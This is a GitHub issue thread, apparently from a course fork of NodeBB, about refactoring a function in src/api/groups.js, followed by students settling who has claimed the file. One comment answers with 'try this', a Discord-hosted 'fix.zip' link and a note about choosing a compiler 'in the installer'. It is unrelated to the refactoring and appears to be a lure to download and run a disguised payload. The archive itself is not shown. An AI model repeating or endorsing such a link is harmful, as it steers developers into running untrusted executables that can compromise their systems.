### ISSUE TITLE
Refactoring code in src/api/groups.js

### ISSUE THREAD

**Issue by aalman3** [CMU-17313Q/NodeBB-F24#67]
### Anything else?

Refactor this function to reduce its Cognitive Complexity from 18 to the 15 allowed

**Comment by Klevente12** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by aalman3** [comment]
I would like to work on this please!

**Comment by Aya-Abdel-Hamid** [comment]
Hello. I have already chosen this file a couple of days ago. You're supposed to choose a different file because 2 people can't work on the same file unfortunately.
Thanks!

**Comment by aalman3** [comment]
my bad i just checked again. ill change it tmrw afternoon dw.

**Comment by Aya-Abdel-Hamid** [comment]
no worries. thank you and good luck!
